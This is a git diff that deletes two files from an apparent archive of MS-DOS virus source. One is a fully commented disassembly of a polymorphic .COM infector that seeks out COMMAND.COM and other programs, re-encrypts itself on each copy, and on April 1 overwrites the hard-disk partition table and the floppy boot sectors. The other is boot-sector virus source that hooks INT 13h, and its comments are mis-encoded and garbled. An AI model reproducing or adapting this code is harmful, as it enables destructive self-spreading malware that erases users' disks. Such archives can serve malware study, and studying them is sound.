-0107 2A 00 ; generation counter, never used (?)
-
-; prepare stack for tricks
-; stack usage:
-; [BP + 2] cleared but not used
-; [BP + 0] offset in block
-; [BP - 2] low byte of size of decrypted part and encryption key
-
-0109 0E push cs ; make free space on stack
-010A E80000 call 010D ; put current offset on the stack
-010D FA cli ; disable interrupt to safe stack
-010E 8BEC mov bp,sp
-0110 58 pop ax
-0111 32C0 xor al,al
-0113 894602 mov [bp+02],ax ; corrupt debbuger return address ??
-0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt
-
-; encrypt virus code, this routine is changed in different virus copies
-
-011B B9CE05 mov cx,05CE ; length of decrypted block
-011E B08C mov al,8C ; 8C is changed!
-0120 8846FF mov [bp-01],al
-0123 8B5E00 mov bx,[bp] ; current position in block
-; ^^ changed, possible 3 wariants:
-; ..5E.. mov bx,[bp] versions 0, 1, 2
-; ..76.. mov si,[bp] versions 3, 4, 5
-; ..7E.. mov di,[bp] versions 6, 7, 8
-
-0126 884EFE mov [bp-02],cl ; low byte of counter
-0129 8A4EFF mov cl,[bp-01] ; encrypt key
-012C D207 rol byte ptr [bx],cl ; byte manipulation
-; ^^^^ changed, possible 9 wariants:
-; 000F add byte ptr [bx],cl version 0
-; 300F xor byte ptr [bx],cl version 1
-; D2O7 rol byte ptr [bx],cl version 2
-; 000C add byte ptr [si],cl version 3
-; 300C xor byte ptr [si],cl version 4
-; D204 rol byte ptr [si],cl version 5
-; 000D add byte ptr [di],cl version 6
-; 300D xor byte ptr [di],cl version 7
-; D205 rol byte ptr [di],cl version 8
-
-012E EB00 jmp 0130 ; short pause
-0130 43 inc bx ; position in block
-; ^^ changed, possible 3 wariants:
-; 43 inc bx version 0, 1, 2
-; 46 inc si version 3, 4, 5
-; 47 inc di version 6, 7, 8
-
-0131 8A4EFE mov cl,[bp-02] ; restore block size
-0134 E2F0 loop 0126 ; offset is decrypted!
-
-; encrypted part
-
-0136 FB sti
-
-; get address of curent DTA and store it on the stack
-
-0137 B42F mov ah,2F
-0139 CD21 int 21
-013B 06 push es
-013C 53 push bx
-
-; get keyboard status bits
-
-013D 33C0 xor ax,ax
-013F 8ED8 mov ds,ax
-0141 A01704 mov al,[0417]
-0144 2410 and al,10 ; extract scroll lock state
-0146 50 push ax ; store
-0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag
-
-; restore DS
-
-014C 8CC8 mov ax,cs
-014E 8ED8 mov ds,ax
-
-; intercepte INT 24h
-
-0150 BAC606 mov dx,06C6
-0153 B82425 mov ax,2524 ; set interrupt vector
-0156 CD21 int 21
-
-; search for PATH= in environment block
-
-0158 A12C00 mov ax,[002C] ; segment of environment block
-015B 8EC0 mov es,ax
-015D 33FF xor di,di ; begin of environment block
-015F FC cld
-
-0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker
-0164 741D je 0183 ; end fo block
-
-0166 BE1B05 mov si,051B ; offset of string 'PATH='
-0169 B90500 mov cx,0005 ; length of string
-016C 8BC7 mov ax,di ; starting address
-016E F3A6 rep cmpsb ; compare
-0170 7411 je 0183 ; found
-
-0172 8BF8 mov di,ax ; last starting point
-0174 32C0 xor al,al
-0176 B5FF mov ch,FF ; maximum block size
-0178 F2AE repnz scasb
-017A 74E4 je 0160
-
-017C BF1A05 mov di,051A ; end of buffer for path
-017F 8CC8 mov ax,cs ; restore ES
-0181 8EC0 mov es,ax
-0183 C706C1056205 mov word ptr [05C1],0562
-
-; set local DTA
-
-0189 BA3605 mov dx,0536
-018C B41A mov ah,1A ; set DTA
-018E CD21 int 21
-
-0190 A1F906 mov ax,[06F9]
-0193 A3F706 mov [06F7],ax
-0196 A1FD06 mov ax,[06FD]
-0199 A3FB06 mov [06FB],ax
-019C B90500 mov cx,0005 ; counter of potential victims
-019F BA1505 mov dx,0515 ; '*.COM', 0
-01A2 06 push es
-01A3 57 push di
-01A4 51 push cx
-
-01A5 8CC8 mov ax,cs
-01A7 8EC0 mov es,ax
-01A9 B9FFFF mov cx,FFFF ; all possible attributes
-01AC B44E mov ah,4E ; find first
-01AE EB06 jmp 01B6
-
-01B0 59 pop cx ; restore counter
-01B1 E35B jcxz 020E ; limit reached, check show/destruction
-
-01B3 B44F mov ah,4F ; find next
-01B5 51 push cx ; store counter
-
-01B6 CD21 int 21
-01B8 7203 jb 01BD ; continue
-
-01BA E9F100 jmp 02AE
-
-; restore address of path in environment block
-
-01BD 59 pop cx
-01BE 5F pop di
-01BF 07 pop es
-
-01C0 26803D00 cmp es:byte ptr [di],00 ; end of block?
-01C4 744A je 0210 ; yes
-
-; copy path to buffer
-
-01C6 BB6205 mov bx,0562 ; offset of buffer
-
-01C9 268A05 mov al,es:[di] ; next character
-01CC 0AC0 or al,al ; end of block?
-01CE 740A je 01DA ; yes
-
-01D0 47 inc di
-01D1 3C3B cmp al,3B ; ';', end of path?
-01D3 7405 je 01DA ; yes
-
-01D5 8807 mov [bx],al ; copy character
-01D7 43 inc bx ; increase pointer
-01D8 EBEF jmp 01C9 ; get next character
-
-01DA 81FB6205 cmp bx,0562 ; buffer not empty?
-01DE 74E0 je 01C0 ; empty
-
-01E0 8A47FF mov al,[bx-01]
-01E3 3C3A cmp al,3A ; ':', root directory
-01E5 7408 je 01EF ; yes
-
-01E7 3C5C cmp al,5C ; check last character, '\'
-01E9 7404 je 01EF ; there is
-
-01EB C6075C mov byte ptr [bx],5C ; add '\'
-01EE 43 inc bx ; pointer to last character
-01EF 06 push es
-01F0 57 push di
-01F1 51 push cx
-01F2 891EC105 mov [05C1],bx ; store it
-01F6 8BF3 mov si,bx
-01F8 81EB6205 sub bx,0562 ; find path length
-01FC 8BCB mov cx,bx
-01FE BF1405 mov di,0514 ; destination buffer
-0201 8CC8 mov ax,cs ; restore ES
-0203 8EC0 mov es,ax
-0205 4E dec si
-0206 FD std
-0207 F3A4 rep movsb ; copy
-0209 8BD7 mov dx,di
-020B 42 inc dx
-020C EB97 jmp 01A5 ; find first
-
-; end of infection proces, check condition for destruction/show
-
-020E 58 pop ax ; balance stack
-020F 58 pop ax
-
-0210 8CC8 mov ax,cs ; restore ES
-0212 8EC0 mov es,ax
-
-; get date
-
-0214 B42A mov ah,2A ; get date
-0216 CD21 int 21
-
-0218 81FA0104 cmp dx,0401 ; April 1?
-021C 7533 jne 0251 ; no
-
-;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
-;
-; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B:
-;
-;<><><><><><><><><><><><><><><><><><><><><><><><><><><><>
-
-; copy partition table to sector 11h of side 0, track 0
-
-021E BA8000 mov dx,0080 ; first hard drive
-0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table)
-0224 BB0307 mov bx,0703 ; destroy victim code
-0227 B80102 mov ax,0201 ; read 1 sector
-022A 52 push dx
-022B 51 push cx
-022C 53 push bx
-022D CD13 int 13 ; disk I/O
-022F 5B pop bx
-0230 59 pop cx
-0231 5A pop dx
-0232 B111 mov cl,11 ; new place for partition table
-0234 B80103 mov ax,0301 ; write partition table
-0237 CD13 int 13
-
-; set and of sector marker in the buffer
-
-0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker
-
-; overwrite partition table
-
-023F B280 mov dl,80
-0241 E87404 call 06B8 ; write one sector to disk
-
-; overwrite boot sector of drive A:
-
-0244 32D2 xor dl,dl
-0246 E86F04 call 06B8 ; write one sector do disk
-
-; overwrite boot sector of drive B:
-
-0249 B201 mov dl,01
-024B E86A04 call 06B8 ; write disk
-
-024E EB0A jmp 025A
-0250 90 nop
-
-; compare date
-
-0251 81FA180C cmp dx,0C18 ; december 24?
-0255 7203 jb 025A ; date earlier
-
-;<><><><<><><><><><><><><><><><><><><><>
-;
-; CHRISTMAS SHOW
-;
-; see the description of subroutine 05D7
-;<><><><><><><><><><><><><><><><><><><><><>
-
-0257 E87D03 call 05D7 ; drow christmas tree
-
-; make sound
-
-025A E440 in al,40
-025C 3CF8 cmp al,F8
-025E 7206 jb 0266
-
-0260 E461 in al,61
-0262 0C03 or al,03
-0264 E661 out 61,al
-
-; restore the state of scroll lock flag
-
-0266 33C0 xor ax,ax
-0268 8ED8 mov ds,ax
-026A 58 pop ax
-026B 08061704 or [0417],al
-
-; restore INT 24h
-
-026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP
-0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP
-0279 B82425 mov ax,2524 ; set interrupt vector
-027C CD21 int 21
-
-; restore DTA
-
-027E 5A pop dx
-027F 1F pop ds
-0280 B41A mov ah,1A ; set DTA
-0282 CD21 int 21
-
-; restore DS
-
-0284 8CC8 mov ax,cs
-0286 8ED8 mov ds,ax
-
-0288 BEF006 mov si,06F0
-028B 8B3EF706 mov di,[06F7]
-028F 033EFB06 add di,[06FB]
-0293 57 push di
-0294 B90700 mov cx,0007
-0297 FC cld
-0298 F3A4 rep movsb
-029A 33C0 xor ax,ax
-029C 8BD8 mov bx,ax
-029E 8BD0 mov dx,ax
-02A0 8BE8 mov bp,ax
-
-02A2 8B36F706 mov si,[06F7]
-02A6 BF0001 mov di,0100
-02A9 8B0EFB06 mov cx,[06FB]
-02AD C3 ret
-
-02AE BE5405 mov si,0554 ; file name in FCB
-02B1 8B3EC105 mov di,[05C1] ; address of destination
-02B5 B90D00 mov cx,000D ; length of asciiz string
-02B8 FC cld
-02B9 F3A4 rep movsb ; copy
-02BB BF2005 mov di,0520 ; buffer for file name
-02BE E8FA01 call 04BB ; copy
-02C1 7503 jne 02C6
-
-02C3 E9EAFE jmp 01B0 ; find next/destruct/show
-
-02C6 BF2B05 mov di,052B
-02C9 E8EF01 call 04BB ; copy file name
-02CC 7503 jne 02D1
-
-02CE E9DFFE jmp 01B0 ; find next/destruct/show
-
-02D1 C606610500 mov byte ptr [0561],00
-02D6 90 nop
-02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA
-02DC 740F je 02ED ; hiden, system or read only, open file
-
-02DE BA6205 mov dx,0562 ; file name
-02E1 33C9 xor cx,cx ; clear all attributes
-02E3 B80143 mov ax,4301 ; set file attributes
-02E6 CD21 int 21
-02E8 7303 jnb 02ED ; open file
-
-02EA E9C3FE jmp 01B0 ; find next/destruct/show
-
-02ED BA6205 mov dx,0562
-02F0 B8023D mov ax,3D02 ; open file for read/write
-02F3 CD21 int 21
-
-02F5 8BD8 mov bx,ax ; handle
-02F7 7303 jnb 02FC
-
-02F9 E9B4FE jmp 01B0 ; find next
-
-; check file size
-
-02FC A15205 mov ax,[0552] ; high word of file size in DTA
-02FF 0BC0 or ax,ax
-0301 7403 je 0306 ; file below 64K
-
-0303 E99001 jmp 0496 ; close file and find next
-
-0306 A15005 mov ax,[0550] ; lower word of file size
-0309 3D0700 cmp ax,0007 ; minimum file size
-030C 72F5 jb 0303 ; close file and find next
-
-030E 3D00F8 cmp ax,F800 ; maximum file size
-0311 73F0 jnb 0303 ; close file and find next
-
-; mayby already infected?
-
-0313 8B16F706 mov dx,[06F7] ; form address of bufer
-0317 0316FB06 add dx,[06FB]
-031B B90700 mov cx,0007 ; number of bytes
-031E 52 push dx
-031F 51 push cx
-0320 B43F mov ah,3F ; read file
-0322 CD21 int 21
-
-0324 59 pop cx
-0325 5E pop si
-0326 7208 jb 0330 ; read error, close and find next
-
-; compare first 7 bytes with own code
-
-0328 BF0001 mov di,0100 ; destination
-032B FC cld
-032C F3A6 rep cmpsb
-032E 7503 jne 0333
-
-0330 E96301 jmp 0496 ; close file and find next, (infected!)
-
-; get and store file date and time
-
-0333 B80057 mov ax,5700 ; get file time stamp
-0336 CD21 int 21
-0338 72F6 jb 0330 ; close file, find next
-
-033A 89160107 mov [0701],dx ; store date
-033E 890EFF06 mov [06FF],cx ; store time
-0342 C606610501 mov byte ptr [0561],01
-0347 90 nop
-
-; check file size, if less than 603h bytes then append some garbage
-
-0348 A15005 mov ax,[0550] ; file size
-034B 3D0306 cmp ax,0603
-034E 7321 jnb 0371
-
-; file length is less than 603h, add some garbage
-
-0350 33D2 xor dx,dx
-0352 33C9 xor cx,cx
-0354 B80242 mov ax,4202 ; move file ptr to EOF
-0357 CD21 int 21
-0359 7303 jnb 035E ; no errors, continue
-
-035B E93801 jmp 0496 ; close file and find next
-
-035E B90306 mov cx,0603 ; number of bytes
-0361 2B0E5005 sub cx,[0550] ; file size
-0365 B440 mov ah,40 ; write file
-0367 CD21 int 21
-0369 B80306 mov ax,0603 ; new file size
-036C 7303 jnb 0371
-
-036E E92501 jmp 0496 ; close file and find next
-
-; now file is at least 603h bytes long
-
-0371 FEC4 inc ah
-0373 A3F906 mov [06F9],ax ; oryginal file size + 256
-0376 A15005 mov ax,[0550] ; file size
-0379 BE0306 mov si,0603 ; virus length
-037C 33FF xor di,di
-037E 3BC6 cmp ax,si
-0380 7302 jnb 0384
-
-0382 8BF0 mov si,ax
-
-0384 8936FD06 mov [06FD],si
-
-0388 8BD7 mov dx,di
-038A 33C9 xor cx,cx
-038C B80042 mov ax,4200 ; move file ptr to BOF
-038F CD21 int 21
-0391 7303 jnb 0396
-
-0393 E90001 jmp 0496 ; close file and find next
-
-0396 8B16F706 mov dx,[06F7]
-039A 0316FB06 add dx,[06FB]
-039E B90002 mov cx,0200
-03A1 3BF1 cmp si,cx
-03A3 7302 jnb 03A7
-
-03A5 8BCE mov cx,si ; number of bytes
-
-03A7 52 push dx
-03A8 51 push cx
-03A9 B43F mov ah,3F ; read file
-03AB CD21 int 21
-03AD 59 pop cx
-03AE 5A pop dx
-03AF 7303 jnb 03B4 ; continue
-
-03B1 E9E200 jmp 0496 ; close file and find next
-
-03B4 52 push dx
-03B5 51 push cx
-03B6 33D2 xor dx,dx
-03B8 33C9 xor cx,cx
-03BA B80242 mov ax,4202 ; move file ptr to EOF
-03BD CD21 int 21
-03BF 59 pop cx
-03C0 5A pop dx
-03C1 7303 
jnb 03C6 ; continue - -03C3 E9D000 jmp 0496 ; close file and find next - -03C6 B440 mov ah,40 ; write file -03C8 CD21 int 21 -03CA 7303 jnb 03CF - -03CC E9C700 jmp 0496 ; close file and find next - -03CF 81C70002 add di,0200 -03D3 81EE0002 sub si,0200 -03D7 7602 jbe 03DB - -03D9 EBAD jmp 0388 - -03DB FF060701 inc word ptr [0107] ; infection counter -03DF 33D2 xor dx,dx -03E1 33C9 xor cx,cx -03E3 B80042 mov ax,4200 ; move file ptr to BOF -03E6 CD21 int 21 -03E8 7303 jnb 03ED - -03EA E9A900 jmp 0496 ; close file and find next - -03ED 53 push bx ; store handle -03EE E440 in al,40 -03F0 A807 test al,07 -03F2 74FA je 03EE - -03F4 A21F01 mov [011F],al ; change decryption key - -; get random number from system timer count - -03F7 33C0 xor ax,ax -03F9 8AF8 mov bh,al -03FB 8ED8 mov ds,ax -03FD A06C04 mov al,[046C] ; timer, low byte - -0400 8CCA mov dx,cs ; restore DS -0402 8EDA mov ds,dx - -; generate rundom number in BX in the range 0..8 - -0404 B103 mov cl,03 -0406 F6F1 div cl ; AL <- AL/3, AH <- remainder -0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) -040A 32E4 xor ah,ah ; prepare division -040C F6F1 div cl ; AL <- AL / 9, AH <- remainder -040E 8AC4 mov al,ah ; AL <- second remainder -0410 02C0 add al,al ; *2, AL in [0..4] -0412 02C4 add al,ah ; *3, AL in [0..6] -0414 02C5 add al,ch ; first remainder -0416 8AD8 mov bl,al ; BL in [0..8] - -; multiply BX by 4 (table entry size) - -0418 03DB add bx,bx -041A 03DB add bx,bx -041C 81C3C906 add bx,06C9 ; offset of table - -; modify encryption routine (automodyfication) - -0420 8A07 mov al,[bx] -0422 A22401 mov [0124],al ; 3 versions 5E/76/7E -0425 8B4701 mov ax,[bx+01] -0428 A32C01 mov [012C],ax ; 9 wersions -042B 8A4703 mov al,[bx+03] ; 3 versions -042E A23001 mov [0130],al -0431 8AC5 mov al,ch - -; prepare decrypt routine - -0433 BBED06 mov bx,06ED -0436 D7 xlat -0437 A26104 mov [0461],al ; modify decryption routine - -; write new encryption routine to file - -043A 5B pop bx ; restore handle -043B BA0001 mov dx,0100 ; 
begin of file -043E B93500 mov cx,0035 ; block size -0441 B440 mov ah,40 ; write file -0443 CD21 int 21 -0445 724F jb 0496 ; close file and find next - -; decryption routine - -0447 BE3501 mov si,0135 ; start of decrypted block -044A B9CE05 mov cx,05CE ; size of decrypted block -044D 53 push bx ; store handle -044E 51 push cx -044F B80002 mov ax,0200 -0452 8B1EF706 mov bx,[06F7] -0456 031EFB06 add bx,[06FB] -045A 53 push bx -045B 8A0E1F01 mov cl,[011F] ; decription key - -045F 8A2C mov ch,[si] -0461 D2CD ror ch,cl ; <-- changed (3 variants) - -; ^^ changed byte, possible wariants: -; 28CD sub ch,cl versions: 0, 3, 6 -; 30CD xor ch,cl versions: 1, 4, 7 -; D2CD ror ch,cl versions: 2, 5, 8 - -0463 882F mov [bx],ch -0465 43 inc bx -0466 46 inc si -0467 48 dec ax -0468 75F5 jne 045F - -046A 5A pop dx -046B 59 pop cx -046C 5B pop bx -046D 51 push cx -046E 81F90102 cmp cx,0201 -0472 7203 jb 0477 - -0474 B90002 mov cx,0200 -0477 B440 mov ah,40 ; write file -0479 CD21 int 21 -047B 59 pop cx -047C 7218 jb 0496 ; close file and find next - -047E 81E90002 sub cx,0200 -0482 77C9 ja 044D - -; restore file time stamp - -0484 8B160107 mov dx,[0701] ; file date -0488 8B0EFF06 mov cx,[06FF] ; file time -048C B80157 mov ax,5701 ; set file time stamp -048F CD21 int 21 -0491 7203 jb 0496 ; close file and find next - -; decrease counter on the stack - -0493 59 pop cx -0494 49 dec cx -0495 51 push cx - -0496 B43E mov ah,3E ; close file -0498 CD21 int 21 -049A 8A0E4B05 mov cl,[054B] ; attributes -049E FE0E6105 dec byte ptr [0561] -04A2 7405 je 04A9 - -04A4 F6C107 test cl,07 ; hidden, system, read only -04A7 740F je 04B8 - -04A9 80F920 cmp cl,20 ; archive -04AC 740A je 04B8 - -04AE BA6205 mov dx,0562 ; file name -04B1 32ED xor ch,ch -04B3 B80143 mov ax,4301 ; set file attributes -04B6 CD21 int 21 -04B8 E9F5FC jmp 01B0 ; find next - -;---------------------------------------- -; move 11 bytes do DS:DI ('C:\COMMAND.') - -04BB BE6205 mov si,0562 -04BE B90B00 mov cx,000B -04C1 FC cld -04C2 F3A6 
rep cmpsb -04C4 C3 ret - -; buffer for path - -04C5 30 31 32 33 34 35 36 37 01234567 -04CD 38 39 30 31 32 33 34 35 89012345 -04D5 36 37 38 39 30 31 32 33 67890123 -04DD 34 35 36 37 38 39 30 31 45678901 -04E5 32 33 34 35 36 37 38 39 23456789 -04ED 30 31 32 33 34 35 36 37 01234567 -04F5 38 39 30 31 32 33 34 35 89012345 -04FD 36 37 38 43 3A 5C 4A 45 678C:\JE -0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P -050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ - -; paterns for search - -0515 2A 2E 43 4F 4D 00 50 41 *.COM PA -051D 54 48 3D TH= - -; buffers for file names - -0520 49 42 4D 42 49 IBMBI -0525 4F 2E 43 4F 4D 00 O.COM - -052B 49 42 IB -052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM -0535 00 - -; local DTA - -0536 03 3F 3F 3F 3F 3F 3F ;\ -053D 3F 3F 43 4F 4D FF 02 00 ; | reserved -0545 00 00 00 00 00 00 ;/ -054B 20 ; file attribute -054C 00 60 71 0E ; file time stamp -0550 DB 62 00 00 ; file size -0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) - -0561 01 ; flag: attributes are changed - -0562 43 3A 5C C:\ -0565 43 4F 4D 4D 41 4E 44 2E COMMAND. -056D 43 4F 4D 00 00 4D 00 00 COM M -0575 00 2E 43 4F 4D 00 4F 68 .COM Oh -057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! -0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN -058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O -0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo -059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh -05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! -05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN -05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O -05BD 68 4E 6F 21 hNo! 
- -05C1 65 05 ; - -;--------------------------------------- -; write character (or space) cx times - -05C3 B020 mov al,20 - -05C5 50 push ax -05C6 E89E00 call 0667 ; write character -05C9 58 pop ax -05CA E2F9 loop 05C5 -05CC C3 ret - -;------------- -; next line - -05CD B00D mov al,0D -05CF E89500 call 0667 ; write character -05D2 B00A mov al,0A -05D4 E99000 jmp 0667 ; write character - -;------------------------------ -; drow christmast tree -; -; result will look like this: -; -; -; ­ -; *** -; ***** -; ******* -; ********* -; *********** -; ************* -; *************** -; ***************** -; ******************* -; ********************* -; *********************** -; ************************* -; *************************** -; ***************************** -; ÛÛÛ -; ÛÛÛ -; ÛÛÛ -;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ -; Und er lebt doch noch : Der Tannenbaum ! -; Frohe Weihnachten ... -; - -05D7 B92700 mov cx,0027 -05DA E8E6FF call 05C3 ; clear 39 characters -05DD B0AD mov al,AD ; '­' -05DF E88500 call 0667 ; write character -05E2 E8E8FF call 05CD ; new line -05E5 BB0300 mov bx,0003 -05E8 BA2600 mov dx,0026 - -05EB 8BCA mov cx,dx -05ED E8D3FF call 05C3 ; write CX spaces -05F0 8BCB mov cx,bx -05F2 B02A mov al,2A ; '*' -05F4 E8CEFF call 05C5 ; write CX characters -05F7 E8D3FF call 05CD ; new line -05FA 4A dec dx -05FB 83C302 add bx,0002 -05FE 83FB1F cmp bx,001F -0601 75E8 jne 05EB - -0603 BB0300 mov bx,0003 -0606 B92600 mov cx,0026 -0609 E8B7FF call 05C3 ; write CX spaces -060C B90300 mov cx,0003 -060F B0DB mov al,DB ; 'Û' -0611 E8B1FF call 05C5 ; write CX characters -0614 E8B6FF call 05CD ; next line -0617 4B dec bx -0618 75EC jne 0606 - -061A B95000 mov cx,0050 ; full line -061D B0CD mov al,CD ; 'Í' -061F E8A3FF call 05C5 ; write character CX times -0622 B91300 mov cx,0013 -0625 E89BFF call 05C3 ; write CX spaces -0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... 
-062B E82C00 call 065A ; write string -062E B91D00 mov cx,001D -0631 E88FFF call 05C3 ; clear part of line -0634 EB24 jmp 065A ; write asciiz string pointed by BX -0636 90 nop - -0637 E80000 call 063A - -063A 5B pop bx -063B 83C30D add bx,000D -063E 8CC8 mov ax,cs -0640 8ED8 mov ds,ax -0642 E81500 call 065A ; write string -0645 EBFE jmp 0645 ; hang CPU - -0647 41 70 72 69 6C 2C 20 41 April, A -064F 70 72 69 6C 20 2E 2E 2E pril ... -0657 20 07 00 - -;----------------------------------- -; write asciiz string pointed by BX - -065A 8A07 mov al,[bx] ; get character -065C 43 inc bx ; next character -065D 0AC0 or al,al ; and of string? -065F 7405 je 0666 ; yes, RET - -0661 E80300 call 0667 ; write character -0664 EBF4 jmp 065A ; get next character -0666 C3 ret - -;-------------------- -; write character TTL - -0667 52 push dx -0668 51 push cx -0669 53 push bx -066A 32FF xor bh,bh -066C B40E mov ah,0E -066E CD10 int 10 -0670 5B pop bx -0671 59 pop cx -0671 59 pop cx -0672 5A pop dx -0673 C3 ret - -0674 55 6E 64 20 65 72 20 6C Und er l -067C 65 62 74 20 64 6F 63 68 ebt doch -0684 20 6E 6F 63 68 20 3A 20 noch : -068C 44 65 72 20 54 61 6E 6E Der Tann -0694 65 6E 62 61 75 6D 20 21 enbaum ! -069C 0D 0A 00 46 72 6F 68 65 Frohe -06A4 20 57 65 69 68 6E 61 63 Weihnac -06AC 68 74 65 6E 20 2E 2E 2E hten ... 
-06B4 0D 0A 07 00 - -;------------------------------------------ -; write one sector to disk specified in DL -; track 9, side 0 sector 1 - -06B8 32F6 xor dh,dh -06BA B90100 mov cx,0001 -06BD BB3706 mov bx,0637 -06C0 B80103 mov ax,0301 -06C3 CD13 int 13 -06C5 C3 ret - -;================== -; INT 24h handler - -06C6 B000 mov al,00 -06C8 CF iret - -; table of bytes for changing encrypt routine - -06C9 5E 00 0F 43 -06CD 5E 30 0F 43 -06D1 5E D2 07 43 -06D5 76 00 0C 46 -06D9 76 30 0C 46 -06DD 76 D2 04 46 -06E1 7E 00 0D 47 -06E5 7E 30 0D 47 -06E9 7E D2 05 47 - -; table for variants of decrypt routine - -06ED 28 30 D2 - -; part of victime code - -06F0 F3A4 rep movsb -06F2 8BF1 mov si,cx -06F4 8BF9 mov di,cx -06F6 C3 ret - -06F7 0307 ; offset of buffer/modified code -06F9 DB63 ; file size + 256 -06FB C603 ; -06FD 0306 ; -06FF 0060 ; file date -0701 710E ; file time - diff --git a/MSDOS/X-Index/Virus.MSDOS.Unknown.xpart.asm b/MSDOS/X-Index/Virus.MSDOS.Unknown.xpart.asm deleted file mode 100644 index 03614d07..00000000 --- a/MSDOS/X-Index/Virus.MSDOS.Unknown.xpart.asm +++ /dev/null 
@@ -1,241 +0,0 @@ - jmp far ptr loc_2 ;*(07C0:0005) - jmp loc_8 ; (00A1) -data_27 db 0 -data_28 dd 0F000EC59h -data_29 dd 9F8000E4h -data_30 dd 07C00h - -;----------------------------------------------------------------------------- -; ‚µ®¤­  ²®·ª  ­  INT 13h -;----------------------------------------------------------------------------- - - push ds - push ax - cmp ah,2 ; €ª® ´³­ª¶¨¿²  ¥ ¯®-¬ «ª  ®² - jb loc_3 ; 2 ¨«¨ ¯®-£®«¿¬  ¨«¨ ° ¢­  - cmp ah,4 ; ­  4 ¨§¯º«­¿¢  ­ ¯°° ¢® INT 13h - jae loc_3 - or dl,dl ; “±²°®¨±²¢®²® ¥ A ? - jnz loc_3 - xor ax,ax ; Zero register - mov ds,ax - mov al,byte ptr ds:[43Fh] ; °®¢¥°¿¢  ¤ «¨ ¬®²®°  ­  - test al,1 ; A ¥ ¢ª«¾·¥­ - jnz loc_3 ; Jump if not zero - call sub_1 ; ޝ¨² ¤  § ° §¿¢  -loc_3: - pop ax - pop ds - jmp cs:data_28 ; (6B8E:0009=0EC59h) - -;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß -; SUBROUTINE -;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ - -sub_1 proc near - push bx - push cx - push dx ; ‡ ¯ §¢  °¥£¨±²°¨²¥ - push es - push si - push di - mov si,4 -loc_4: - mov ax,201h - push cs - pop es - mov bx,200h - xor cx,cx ; Zero register - mov dx,cx - inc cx - pushf - call cs:data_28 ; —¥²¥ BOOT ±¥ª²®°  - jnc loc_5 ; Jump if carry=0 - xor ax,ax ; °¨ £°¥¸ª  °¥ª «¨¡°¨°  - pushf ; ³±²°®¨±²¢®²® - call cs:data_28 ; (6B8E:0009=0EC59h) - dec si - jnz loc_4 ; ° ¢¨ 4 ®¯¨²  - jmp short loc_7 ; ˆ§µ®¤ - nop -loc_5: - xor si,si ; Zero register - mov di,200h - cld ; Clear direction - push cs - pop ds - lodsw ; °®¢¥°¿¢  ¤ «¨ ¥ § ° §¥­ - cmp ax,[di] ; ¯°®·¥²¥­¨¿ ¤¨±ª - jne loc_6 - lodsw - cmp ax,[di+2] - je loc_7 ; €ª® ¥ ¨§«¨§  -loc_6: - mov ax,301h - mov bx,200h ; °¥¬¥±²¢  BOOT - mov cl,3 - mov dh,1 - pushf - call cs:data_28 - jc loc_7 ; Jump if carry Set - mov ax,301h - xor bx,bx ; ‡ ¯¨±¢  ¢¨°³±  - mov cl,1 - xor dx,dx - pushf - call cs:data_28 -loc_7: - pop di - pop si - pop es ; ‚º§±² ­®¢¿¢  °¥£¨±²°¨²¥ - pop dx - pop cx - pop bx - retn -sub_1 endp - -loc_8: - xor ax,ax ; Zero 
